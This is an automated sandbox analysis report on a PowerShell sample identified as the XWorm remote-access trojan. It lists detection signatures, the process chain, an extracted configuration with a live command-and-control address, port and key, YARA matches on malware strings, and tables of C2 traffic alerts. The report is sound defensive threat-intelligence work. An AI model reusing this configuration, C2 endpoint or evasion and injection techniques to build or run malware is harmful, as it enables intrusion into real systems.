
Windows Analysis Report
92.255.57_1.112.ps1

Overview

General Information

Sample name: 92.255.57_1.112.ps1
Analysis ID: 1590525
MD5: d2334ba5738e776d924f60934e24874f
SHA1: bb8dfe86ea75e9926de42a8acdfa4f9579681cbb
SHA256: 2a8290c18d10fa8a7e99575855b9fb8e734ea92b1aa7dce9840282c2657ba08c
Tags: booking, ps1, SPAM-ITA, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 3728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 7124 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup
Malware Configuration: Xworm {"C2 url": ["92.255.57.112"], "Port": 4418, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Source | Rule | Description | Author | Strings
00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xcd41:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xcdde:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xcef3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xc99c:$cnc4: POST / HTTP/1.1
00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x1e5379:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1e5416:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x1e552b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1e4fd4:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
0.2.powershell.exe.21c4a460438.2.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.21c4a460438.2.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7f2f:$str01: $VB$Local_Port
  • 0x7f53:$str02: $VB$Local_Host
  • 0x6715:$str03: get_Jpeg
  • 0x6d3b:$str04: get_ServicePack
  • 0x906c:$str05: Select * from AntivirusProduct
  • 0xa00d:$str06: PCRestart
  • 0xa021:$str07: shutdown.exe /f /r /t 0
  • 0xa0d3:$str08: StopReport
  • 0xa0a9:$str09: StopDDos
  • 0xa19f:$str10: sendPlugin
  • 0xa21f:$str11: OfflineKeylogger Not Enabled
  • 0xa377:$str12: -ExecutionPolicy Bypass -File "
  • 0xae81:$str13: Content-length: 5235
0.2.powershell.exe.21c4a460438.2.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0xb141:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xb1de:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xb2f3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xad9c:$cnc4: POST / HTTP/1.1
0.2.powershell.exe.21c4b279478.3.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.2.powershell.exe.21c4b279478.3.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x7f2f:$str01: $VB$Local_Port
  • 0x7f53:$str02: $VB$Local_Host
  • 0x6715:$str03: get_Jpeg
  • 0x6d3b:$str04: get_ServicePack
  • 0x906c:$str05: Select * from AntivirusProduct
  • 0xa00d:$str06: PCRestart
  • 0xa021:$str07: shutdown.exe /f /r /t 0
  • 0xa0d3:$str08: StopReport
  • 0xa0a9:$str09: StopDDos
  • 0xa19f:$str10: sendPlugin
  • 0xa21f:$str11: OfflineKeylogger Not Enabled
  • 0xa377:$str12: -ExecutionPolicy Bypass -File "
  • 0xae81:$str13: Content-length: 5235

System Summary

Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 3728, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 3728, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:27:40.073058+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:44.937260+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:27:51.255164+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:02.442476+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:13.635190+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:14.956835+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:24.817914+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:36.005064+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:36.489510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:37.296156+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:38.348994+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:42.036211+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:42.973564+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:43.095818+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:44.925973+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:48.630200+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:54.584189+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:56.224582+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:28:59.397393+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:10.286476+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:10.408688+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:10.534909+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:14.930046+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:21.005626+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:21.127308+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:26.505737+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:34.036600+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:37.114630+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:37.722426+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:39.411657+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:44.932971+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:51.180581+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:29:53.588912+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:00.926930+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:02.051886+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:02.201358+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:13.305969+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:15.214395+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:21.148508+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:22.589673+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:22.980738+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:28.505065+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:28.628001+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:28.749463+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:28.871836+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:33.927249+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:44.927199+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:45.048649+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:30:56.914325+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:00.770510+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:06.161472+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:07.568542+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:09.051997+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:14.979305+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:16.724496+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:16.846847+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:22.178348+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:27.083048+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
2025-01-14T08:31:29.286494+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:27:40.116270+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:27:51.257204+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:02.445368+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:13.637235+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:24.820770+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:36.007395+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:36.491595+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:37.308760+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:38.351281+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:42.039660+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:42.984115+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:43.098048+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:48.632500+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:54.586259+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:56.481043+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:28:59.411702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.288599+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.410806+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.536690+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.654485+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.659497+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.775817+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:10.785619+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:21.007583+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:21.131335+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:26.510277+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:34.040662+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:37.116024+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:37.739551+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:39.415353+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:51.250458+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:29:53.591335+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:00.932702+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:02.053255+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:02.202639+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:13.307925+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:21.244123+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:22.591934+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:22.984877+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:28.506877+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:28.629443+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:28.750818+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:28.873138+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:33.929262+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:44.929510+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:45.180503+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:45.185470+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:30:56.916244+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:00.774964+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:06.163091+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:07.570003+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:09.053540+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:16.726844+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:16.848458+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:22.187059+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:27.084367+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
2025-01-14T08:31:29.287318+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:27:44.937260+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 92.255.57.112 | 4418 | 192.168.2.6 | 49714 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-14T08:29:20.787767+0100 | 2858799 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49714 | 92.255.57.112 | 4418 | TCP

AV Detection

Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Xworm {"C2 url": ["92.255.57.112"], "Port": 4418, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: 92.255.57_1.112.ps1 | Virustotal: Detection: 18%
Source: 92.255.57_1.112.ps1 | ReversingLabs: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 92.255.57.112
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: 4418
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: P0WER
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: <Xwormmm>
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: XWorm
Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp | String decryptor: USB.exe
Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168693034.0000021C49C80000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp

Networking

            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.112:4418 -> 192.168.2.6:49714
